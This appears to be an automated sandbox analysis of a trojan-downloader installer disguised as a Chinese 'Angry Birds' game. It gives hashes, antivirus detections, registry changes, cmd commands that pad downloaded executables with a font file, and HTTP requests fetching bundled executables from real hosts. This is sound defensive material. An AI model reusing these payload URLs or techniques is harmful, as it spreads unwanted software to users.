Analysis Date2015-01-28 16:46:09
MD59654c5bada3eb72d86f93594feb5909f
SHA1fe6ac30dfd169dfec3664260ed4e6a647d261184

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 856b32eb77dfd6fb67f21d6543272da5 sha1: 6597c511c2ee72f68f5246460f0683dae16dcade size: 24064
Section.rdata md5: dc77f8a1e6985a4361c55642680ddb4f sha1: 3d397ee25b2dd83ab741c67375880151cae94ed8 size: 5120
Section.data md5: 7922d4ce117d7d5b3ac2cffe4b0b5e4f sha1: 4e56bb1994226ae0285c7adee470777262de2c99 size: 1024
Section.ndata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rsrc md5: 32f43c3b01cb3fe9eca93e19f47294d1 sha1: c192680b9bc1e8e75da941c237f0edc580a1d3d4 size: 29184
Timestamp2009-12-05 22:50:52
VersionLegalCopyright: BEARPC精选软件集
ProductName: 愤怒的小鸟
FileDescription: 愤怒的小鸟PC汉化版
FileVersion: 1.0.0
CompanyName: www.bearpc.net
PackerNullsoft PiMP Stub -> SFX
PEhashb6bc5556e915d106e40e7968e3b9661d127c1d8e
IMPhash7fa974366048f9c551ef45714595665e
AV360 Safeno_virus
AVAd-Awareno_virus
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)no_virus
AVAuthentiumno_virus
AVAvira (antivir)TR/Agent.263501
AVBullGuardno_virus
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftno_virus
AVEset (nod32)NSIS/TrojanDownloader.Chindo.R
AVFortinetno_virus
AVFrisk (f-prot)no_virus
AVF-Secureno_virus
AVGrisoft (avg)no_virus
AVIkarusno_virus
AVK7no_virus
AVKasperskyno_virus
AVMalwareBytesRiskware.Chindo
AVMcafeeno_virus
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)no_virus
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp\inetc.dll
Creates FileOfficeAssist.0405.80.1119.exe
Creates File1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp\Base64.dll
Creates File1.rar
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp\System.dll
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileSoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp\ExecCmd.dll
Creates FileMM-liao8302.exe
Creates FileC:\Program Files\2.ico
Creates Fileyx_dts.exe
Creates FileFunshionInstall_C70699.exe
Creates Filesetup_95165069.exe
Creates FileC:\Program Files\4.ico
Deletes FileSoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe
Deletes FileOfficeAssist.0405.80.1119.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse2.tmp
Deletes File1.rar
Deletes File1
Deletes FileMM-liao8302.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsd1.tmp
Deletes Fileyx_dts.exe
Deletes FileFunshionInstall_C70699.exe
Deletes Filesetup_95165069.exe
Deletes FileC:\Program Files\4.ico
Creates ProcessC:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\setup_95165069.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\setup_95165069.exe"
Creates ProcessSoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\yx_dts.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\yx_dts.exe"
Creates ProcessC:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\OfficeAssist.0405.80.1119.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\OfficeAssist.0405.80.1119.exe"
Creates ProcessC:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\MM-liao8302.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\MM-liao8302.exe"
Creates ProcessC:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\SoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\SoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe"
Creates ProcessC:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\FunshionInstall_C70699.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\FunshionInstall_C70699.exe"
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex2.ico
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSint.dpool.sina.com.cn
Winsock DNSt.cn
Winsock DNSmmliao.jianting.net

Process
↳ C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\yx_dts.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\yx_dts.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\MM-liao8302.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\MM-liao8302.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\FunshionInstall_C70699.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\FunshionInstall_C70699.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\SoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\SoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\setup_95165069.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\setup_95165069.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /C copy /b "C:\Program Files\OfficeAssist.0405.80.1119.exe" + "C:\WINDOWS\Fonts\gulim.ttc" "C:\Program Files\OfficeAssist.0405.80.1119.exe"

Process
↳ SoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe

Network Details:

DNSint.dpool.sina.com.cn
Type: A
180.149.136.250
DNSt.cn
Type: A
114.134.80.138
DNSmmliao.jianting.net
Type: A
122.227.42.227
DNS37w.xdwscache.glb0.lxdns.com
Type: A
183.136.208.114
DNSdown.fspcdn.com
Type: A
182.118.38.50
DNSdown.fspcdn.com
Type: A
182.118.38.51
DNSdown.fspcdn.com
Type: A
221.204.189.11
DNSdown.fspcdn.com
Type: A
221.204.189.12
DNSwww.bangshijz.com
Type: A
42.121.255.144
DNSdownload012.e.chinacache.com.cn
Type: A
61.179.105.148
DNSdownload012.e.chinacache.com.cn
Type: A
218.60.107.12
DNSc01.i06.arnic.hadns.net
Type: A
183.56.172.47
DNSc01.i06.arnic.hadns.net
Type: A
222.186.20.122
DNSc01.i06.arnic.hadns.net
Type: A
58.220.2.5
DNSc01.i06.arnic.hadns.net
Type: A
113.17.184.10
DNSc01.i06.arnic.hadns.net
Type: A
121.10.117.139
DNSd.qq66699.com
Type: A
DNSneirong.funshion.com
Type: A
DNSwdl1.cache.wps.cn
Type: A
DNSdl.nx5.com
Type: A
HTTP GEThttp://int.dpool.sina.com.cn/iplookup/iplookup.php
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://t.cn/RZIvNie
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://mmliao.jianting.net/mmliao/MM-liao8302.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://d.qq66699.com/yx/dts/sqft/905848/yx_dts.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://neirong.funshion.com/software/files/silent5/FunshionInstall_C70699.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://www.bangshijz.com/ZmU2YWMzMGRmZDE2OWRmZWMzNjY0MjYwZWQ0ZTZhNjQ3ZDI2MTE4NC5leGU=/40.html
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://wdl1.cache.wps.cn/wps/download/OfficeAssist.0405.80.1119.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://t.cn/RZII9Xg
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://dl.nx5.com/apk/20141222/setup_95165069.exe
User-Agent: NSIS_Inetc (Mozilla)
Flows TCP192.168.1.1:1031 ➝ 180.149.136.250:80
Flows TCP192.168.1.1:1032 ➝ 114.134.80.138:80
Flows TCP192.168.1.1:1033 ➝ 122.227.42.227:80
Flows TCP192.168.1.1:1034 ➝ 183.136.208.114:80
Flows TCP192.168.1.1:1035 ➝ 182.118.38.50:80
Flows TCP192.168.1.1:1036 ➝ 42.121.255.144:80
Flows TCP192.168.1.1:1037 ➝ 61.179.105.148:80
Flows TCP192.168.1.1:1038 ➝ 114.134.80.138:80
Flows TCP192.168.1.1:1039 ➝ 183.56.172.47:80

Raw Pcap
0x00000000 (00000)   47455420 2f69706c 6f6f6b75 702f6970   GET /iplookup/ip
0x00000010 (00016)   6c6f6f6b 75702e70 68702048 5454502f   lookup.php HTTP/
0x00000020 (00032)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000030 (00048)   204e5349 535f496e 65746320 284d6f7a    NSIS_Inetc (Moz
0x00000040 (00064)   696c6c61 290d0a48 6f73743a 20696e74   illa)..Host: int
0x00000050 (00080)   2e64706f 6f6c2e73 696e612e 636f6d2e   .dpool.sina.com.
0x00000060 (00096)   636e0d0a 436f6e6e 65637469 6f6e3a20   cn..Connection: 
0x00000070 (00112)   4b656570 2d416c69 76650d0a 43616368   Keep-Alive..Cach
0x00000080 (00128)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x00000090 (00144)   6368650d 0a0d0a                       che....

0x00000000 (00000)   47455420 2f525a49 764e6965 20485454   GET /RZIvNie HTT
0x00000010 (00016)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000020 (00032)   743a204e 5349535f 496e6574 6320284d   t: NSIS_Inetc (M
0x00000030 (00048)   6f7a696c 6c61290d 0a486f73 743a2074   ozilla)..Host: t
0x00000040 (00064)   2e636e0d 0a436f6e 6e656374 696f6e3a   .cn..Connection:
0x00000050 (00080)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x00000060 (00096)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000070 (00112)   61636865 0d0a0d0a 76650d0a 43616368   ache....ve..Cach
0x00000080 (00128)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x00000090 (00144)   6368650d 0a0d0a                       che....

0x00000000 (00000)   47455420 2f6d6d6c 69616f2f 4d4d2d6c   GET /mmliao/MM-l
0x00000010 (00016)   69616f38 3330322e 65786520 48545450   iao8302.exe HTTP
0x00000020 (00032)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000030 (00048)   3a204e53 49535f49 6e657463 20284d6f   : NSIS_Inetc (Mo
0x00000040 (00064)   7a696c6c 61290d0a 486f7374 3a206d6d   zilla)..Host: mm
0x00000050 (00080)   6c69616f 2e6a6961 6e74696e 672e6e65   liao.jianting.ne
0x00000060 (00096)   740d0a43 6f6e6e65 6374696f 6e3a204b   t..Connection: K
0x00000070 (00112)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x00000080 (00128)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000090 (00144)   68650d0a 0d0a0a                       he.....

0x00000000 (00000)   47455420 2f79782f 6474732f 73716674   GET /yx/dts/sqft
0x00000010 (00016)   2f393035 3834382f 79785f64 74732e65   /905848/yx_dts.e
0x00000020 (00032)   78652048 5454502f 312e310d 0a557365   xe HTTP/1.1..Use
0x00000030 (00048)   722d4167 656e743a 204e5349 535f496e   r-Agent: NSIS_In
0x00000040 (00064)   65746320 284d6f7a 696c6c61 290d0a48   etc (Mozilla)..H
0x00000050 (00080)   6f73743a 20642e71 71363636 39392e63   ost: d.qq66699.c
0x00000060 (00096)   6f6d0d0a 436f6e6e 65637469 6f6e3a20   om..Connection: 
0x00000070 (00112)   4b656570 2d416c69 76650d0a 43616368   Keep-Alive..Cach
0x00000080 (00128)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x00000090 (00144)   6368650d 0a0d0a                       che....

0x00000000 (00000)   47455420 2f736f66 74776172 652f6669   GET /software/fi
0x00000010 (00016)   6c65732f 73696c65 6e74352f 46756e73   les/silent5/Funs
0x00000020 (00032)   68696f6e 496e7374 616c6c5f 43373036   hionInstall_C706
0x00000030 (00048)   39392e65 78652048 5454502f 312e310d   99.exe HTTP/1.1.
0x00000040 (00064)   0a557365 722d4167 656e743a 204e5349   .User-Agent: NSI
0x00000050 (00080)   535f496e 65746320 284d6f7a 696c6c61   S_Inetc (Mozilla
0x00000060 (00096)   290d0a48 6f73743a 206e6569 726f6e67   )..Host: neirong
0x00000070 (00112)   2e66756e 7368696f 6e2e636f 6d0d0a43   .funshion.com..C
0x00000080 (00128)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x00000090 (00144)   416c6976 650d0a43 61636865 2d436f6e   Alive..Cache-Con
0x000000a0 (00160)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f5a6d55 3259574d 7a4d4752   GET /ZmU2YWMzMGR
0x00000010 (00016)   6d5a4445 324f5752 6d5a574d 7a4e6a59   mZDE2OWRmZWMzNjY
0x00000020 (00032)   304d6a59 775a5751 305a545a 684e6a51   0MjYwZWQ0ZTZhNjQ
0x00000030 (00048)   335a4449 324d5445 344e4335 6c654755   3ZDI2MTE4NC5leGU
0x00000040 (00064)   3d2f3430 2e68746d 6c204854 54502f31   =/40.html HTTP/1
0x00000050 (00080)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000060 (00096)   4e534953 5f496e65 74632028 4d6f7a69   NSIS_Inetc (Mozi
0x00000070 (00112)   6c6c6129 0d0a486f 73743a20 7777772e   lla)..Host: www.
0x00000080 (00128)   62616e67 7368696a 7a2e636f 6d0d0a43   bangshijz.com..C
0x00000090 (00144)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000a0 (00160)   416c6976 650d0a43 61636865 2d436f6e   Alive..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a                                  ..

0x00000000 (00000)   47455420 2f777073 2f646f77 6e6c6f61   GET /wps/downloa
0x00000010 (00016)   642f4f66 66696365 41737369 73742e30   d/OfficeAssist.0
0x00000020 (00032)   3430352e 38302e31 3131392e 65786520   405.80.1119.exe 
0x00000030 (00048)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000040 (00064)   67656e74 3a204e53 49535f49 6e657463   gent: NSIS_Inetc
0x00000050 (00080)   20284d6f 7a696c6c 61290d0a 486f7374    (Mozilla)..Host
0x00000060 (00096)   3a207764 6c312e63 61636865 2e777073   : wdl1.cache.wps
0x00000070 (00112)   2e636e0d 0a436f6e 6e656374 696f6e3a   .cn..Connection:
0x00000080 (00128)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x00000090 (00144)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000a0 (00160)   61636865 0d0a0d0a 61636865 2d436f6e   ache....ache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a                                  ..

0x00000000 (00000)   47455420 2f525a49 49395867 20485454   GET /RZII9Xg HTT
0x00000010 (00016)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000020 (00032)   743a204e 5349535f 496e6574 6320284d   t: NSIS_Inetc (M
0x00000030 (00048)   6f7a696c 6c61290d 0a486f73 743a2074   ozilla)..Host: t
0x00000040 (00064)   2e636e0d 0a436f6e 6e656374 696f6e3a   .cn..Connection:
0x00000050 (00080)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x00000060 (00096)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000070 (00112)   61636865 0d0a0d0a 6e656374 696f6e3a   ache....nection:
0x00000080 (00128)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x00000090 (00144)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000a0 (00160)   61636865 0d0a0d0a 61636865 2d436f6e   ache....ache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a                                  ..

0x00000000 (00000)   47455420 2f61706b 2f323031 34313232   GET /apk/2014122
0x00000010 (00016)   322f7365 7475705f 39353136 35303639   2/setup_95165069
0x00000020 (00032)   2e657865 20485454 502f312e 310d0a55   .exe HTTP/1.1..U
0x00000030 (00048)   7365722d 4167656e 743a204e 5349535f   ser-Agent: NSIS_
0x00000040 (00064)   496e6574 6320284d 6f7a696c 6c61290d   Inetc (Mozilla).
0x00000050 (00080)   0a486f73 743a2064 6c2e6e78 352e636f   .Host: dl.nx5.co
0x00000060 (00096)   6d0d0a43 6f6e6e65 6374696f 6e3a204b   m..Connection: K
0x00000070 (00112)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x00000080 (00128)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000090 (00144)   68650d0a 0d0a7472 6f6c3a20 6e6f2d63   he....trol: no-c
0x000000a0 (00160)   61636865 0d0a0d0a 61636865 2d436f6e   ache....ache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a                                  ..


Strings
 " ".E.
.
080403a8
1.0.0
!1Aa
#+3;CScs
BEARPC
CompanyName
FileDescription
FileVersion
LegalCopyright
msctls_progress32
Please wait while Setup is loading...
ProductName
StringFileInfo
SysListView32
Translation
VarFileInfo
VS_VERSION_INFO
www.bearpc.net
-:~\,_
*?|<>/":
0B7Qw}
0c%%\\))8?GlQV
0.eIP:$
0/`'|g
<0kac}
#';0m(4
_0n4n1
0RV0ff'
0}xyN5
1/5>uqk
1.8w0O
1AH@7t
1>biDe
1GGVG{
*(1hfPV
>1hsD!
1}?|,O
1u2u3m0m!5
;23vTe
2"&,\45>
+#-28<
2c N*&
2EES7{
2iavRQ
2J9V9I
;{2OCJj
32=h\8g
3B7jFG{
3~qMgk
3yJ.pK
%4\~/6
$(.469+A
$(.469=EFHJ
$(.469=EFM
$(.469=ET
$(.469F
$(.46%A
$(.46J
4}},h_
;4|y3]#v$
5?'3CeZ
57)U`>
5+>	7x0c
[5E''01
5=#!e]%7_f
5i	Oxw
6AD}II
6KDu|3
6>:lLXM
6,%lzXqXY
6n6>n|
6 |rV\q
6Wd*D0
=-/+;:7
77$Q/&=M
*78:YU
/79cUO
7~a<f<n<e
7hSgfh
7p<*hn
<7[v5#
;8721^.
?[8?GOQY
/8HxelH
8NCRCu
8nDDbih/[g
8RBx?\"\
8`xue,0
=:953,&
/953,&
]:953,&
<98=xz
=%99RRLL
>9D<Gt`
9NCo[Ns
&9Y4wz{(!
@9y$+ig:
9y,.=M
AdjustTokenPrivileges
a`ds&2U
ADVAPI32
ADVAPI32.dll
	Ao94w
AppendMenuA
A[TNgk
a]u;t'
]awDPhk
/azY^<
B$1_`ajbgA
b1l^Q[
b>;af{
BeginPaint
bh)F5sA
"bipU8
)bkVBh
b'ROB~
/bYNE~
/^`'C0$
C2a2N2q
c3\&Km
c?)9> o
CallWindowProcA
`$cbXK
cE/08N
CE=+FU
CharNextA
CharPrevA
CheckDlgButton
c_h[\m
C#[/>iiD>8!#7
CloseClipboard
CloseHandle
CoCreateInstance
COMCTL32.dll
CompareFileTime
Control Panel\Desktop\ResourceLocale
CopyFileA
CoTaskMemFree
CreateBrushIndirect
CreateDialogParamA
CreateDirectoryA
CreateFileA
CreateFontIndirectA
CreatePopupMenu
CreateProcessA
CreateThread
CreateWindowExA
CVALp>
... %d%%
D$0+D$(P
d2=kjV
!d"(.469=EFHJMTr
`D8u?_\
@.data
d)|{d@?
D$(+D$ SSP
.DEFAULT\Control Panel\International
DefWindowProcA
d	e@Gc
DeleteFileA
DeleteObject
DestroyWindow
dfT&Yj
DialogBoxParamA
DispatchMessageA
dK#'ov
dnzzqqmhcd
Dooo'MMM
Do-?[q
D$$Ph,
DrawTextA
D$(SPS
-*!$%d:ZU1N
e2qB:&
E[A;5*N
($e$%b?
ed))dd++ee///^^^O
eGLS;d
EmptyClipboard
)::::EMT
E<_'N3$f
EnableMenuItem
EnableWindow
EndDialog
EndPaint
_EO	'X
eQ}R]fZ
Error launching installer
Error writing temporary file. Make sure your temp folder is valid.
ErT,-468
EtjF2]
e%uy%u
ev@m&dm}
ExitProcess
ExitWindowsEx
ExpandEnvironmentStringsA
E|&`Xr
f+3zn=
Ff&R`:^
F)))G/+
FillRect
FindClose
FindFirstFileA
FindNextFileA
FindWindowExA
Fj7(-"ASY4
FreeLibrary
FVtsDE
$g>'	!
g5/k6il
}.GAN\
GA +Ufv
gBp-]\7P
GDI32.dll
GetClassInfoA
GetClientRect
GetCommandLineA
GetCurrentProcess
GetDeviceCaps
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDlgItem
GetDlgItemTextA
GetExitCodeProcess
GetFileAttributesA
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFullPathNameA
GetLastError
GetMessagePos
GetModuleFileNameA
GetModuleHandleA
GetPrivateProfileStringA
GetProcAddress
GetShortPathNameA
GetSysColor
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetTempFileNameA
GetTempPathA
GetTickCount
GetUserDefaultUILanguage
GetVersion
GetWindowLongA
GetWindowRect
GetWindowsDirectoryA
g"}IPN
-gkX-F
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
%,GNw%
G[os84\^
G@p@"$
G(Qjva
g.ZO||k[
h4g2+y
$H7Db@
HEB=:`^[@
HEB=:953-\2
HEB=:953,&"\f
{_HFlJJ
hJy]8b
>_hM[M%~
H( &N$X
hOeFv0
[htA_v
http://nsis.sf.net/NSIS_Error
HtVHtHH
h&.W>~-
hW6J%9
`hY}y!;FV
@i5w44
i=:953,&H
i=;:953,M
{i|C,!/
i$|GS-7
IH`3%&V
ImageList_AddMasked
ImageList_Create
ImageList_Destroy
incomplete download and damaged media. Contact the
Installer integrity check has failed. Common causes include
installer's author to obtain a new copy.
Instu`
InvalidateRect
:iPa{=
i(QT`S
:`i"Re
iRichu
IsWindow
IsWindowEnabled
IsWindowVisible
I ) uH(
iy0"sJF
J2`SGm
j8;Rgm&
	J9@xo
JCz#.i`G
Jen?TT
-*!JEqfi
J=i?XU
jj4k4/j^
J.U+A)oe
k[%$$\
$>Kb,&`
_k:C??
	]KC$"4
k<d<a<kl6
KERNEL32
KERNEL32.dll
K^?FuS
k i#~[
``kk	9X
KKKKQKT
kNj~D[
kV7V65
?K?%`y
\kyFP>)u
kZ{:@l*
)?k-ZO
l ~8FU
laAQn2
lc%%\\))dd++ee//>nl
 lDNkU`
LD_rtr
l$!hR[M
lJ$fS"3
Lk^a~,
{Lk_	E'
LLYT]T/
LoadBitmapA
LoadCursorA
LoadImageA
LoadLibraryA
LoadLibraryExA
LOe}%"
LookupPrivilegeValueA
l;r*,*
.,lRXn
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpynA
lstrlenA
luunniiDu
@LX<P\
>Lzjd~
^::::::;M
!"%,[M
]:::::::M
m1&(!hZ
@|M5ssT($
m72RTj
m`Bj*Lz
`}meMzIAImiiiC
MessageBoxIndirectA
-}M_GAR\
/m=GKn
\Microsoft\Internet Explorer\Quick Launch
MMMMMMMMMMMM
More information at:
MoveFileA
MoveFileExA
m:::::::R
mrf^ivl
MulDiv
MultiByteToWideChar
N]]-0:
N'2BVq
/_]`n5>
?n7o68
.ndata
Nj,R^r
nM=J>q
/"n"n#
nnngwwp
~nnnnnnngx
NSIS Error
~nsu.tmp
NullsoftInst
NulluN	E
Nwb(iY
NWV:U1}{Fh
NYtl8`
}(\_o?
o@5w	Ft1
(O8QRd
?o#ebM
||offZZZJj
]o&G=:6
ole32.dll
OleInitialize
OleUninitialize
~{onyR
OpenClipboard
OpenProcessToken
or$>H)}|
oW@"DjNX
^owgf4
"oy2#%
\P3zUkP
p{:`5S[
PC|GS#
PeekMessageA
pepmpnp
Phj{p*
P=,"i+
PostQuitMessage
PPPPPP
pq<wAq^
p,R{	z
{{]^///^^^^Q
,Q*eMV`
/qMqfC
QP\X\Z
QqAl5R\
qqqqqqq)A
~q+vM-
r3!?cH
R:953,&
%("RBs~
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyExA
RegDeleteValueA
RegEnumKeyA
RegEnumValueA
RegisterClassA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
RemoveDirectoryA
[Rename]
"r"&ET
`r.!GR#
RHEB=:953,&
RichEd20
RichEd32
RichEdit
RichEdit20A
R]IlQ 
'}r%PG^A
rT*)#)
r|TH&a
rt<N;{DSA
:rufP[~
S0C~zH
|"S,?a
ScreenToClient
SearchPathA
SelectObject
SendMessageA
SendMessageTimeoutA
SeShutdownPrivilege
SetBkColor
SetBkMode
SetClassLongA
SetClipboardData
SetCurrentDirectoryA
SetCursor
SetDlgItemTextA
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFileTime
SetForegroundWindow
SetTextColor
SetTimer
SetWindowLongA
SetWindowPos
SetWindowTextA
SHAutoComplete
SHBrowseForFolderA
SHELL32.dll
ShellExecuteA
SHFileOperationA
SHFOLDER
SHGetFileInfoA
SHGetFolderPathA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHLWAPI
ShowWindow
S+jT+:
S$,jVbI
SJ\ys2@
softuW
Software\Microsoft\Windows\CurrentVersion
SQSSSPW
srE@~D
SSS)}}}
SSSSSSSS
[S_Tq}n
svvvvvvvgA
Swwwj=B>
SystemParametersInfoA
> _?=t
_!.@t-
.t.|}+
t#5{e*
t7>]$MT
=t+9p3
^[t{A;
TE^"N*
TFB=:953,&
!This program cannot be run in DOS mode.
tNJ.7O
_^[t	P
-[.^tpp
]tQe67
:-tQhM
TrackPopupMenu
TV/uaa
TWRL/dN
ty<Qym
uC{7Qi
uee*))))00
;;;Ueee
}&U,_]G
UKCT_1y
ulid\VL
un,nqW
USER32.dll
uU4v81
%u.%u%s%s
u?`~vff
`uX\%M
verifying installer: %d%%
VerQueryValueA
VERSION.dll
%ve^Xm
VhusA3
v-{=mG|x
VpgZy]
V.S6)[
VTz;qP
VVCcFj
v#Vh;+@
~~vvphh
~~vvpphc_
~~vvvlia<<
vx6S8j7{
:	}:-W
W7'''''7A
WaitForSingleObject
	=/Wb02
W<b^x >1}
wcuhl-
|w;erK
wk"4+4[5
WKq2o6
wKtrv3:
'w,,lU
WLZ9,~
|wOpT+M@
#W\qEM
W"R?46
WriteFile
WritePrivateProfileStringA
wRO?D)
W?rYg~#
wsprintfA
wT3QeH
WU'%]469=EFHJNl0#A
WWWtF>
wwwwww
wwwwwwww
wwwwwwwwwx
wwwwwwx
wwwwwx
Wx}})u7M/
x2Yg=X
x>5155:
X^7,8=#
xe,g+\^
xgsTMJ
!}XH/\o
X<I*2kr
X;I@b?
XK;s|9
xL~^^6
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
,`*X"nB
x`(#pn/
x/P"u?
x]S|(~
X!s8|E
xthbZQO;?
#x)uC;t
XYYYYO#
yavmd>
yd^	d (
y>KHO8
^Yqo].
yRPCL>
Ysssssss
y@sZ38dFHM
Y<=WCP3;.DP
YYiokX`G
%yyy?0r
}}}yyyti=BF
}}}yyytt
}}}yyyttp
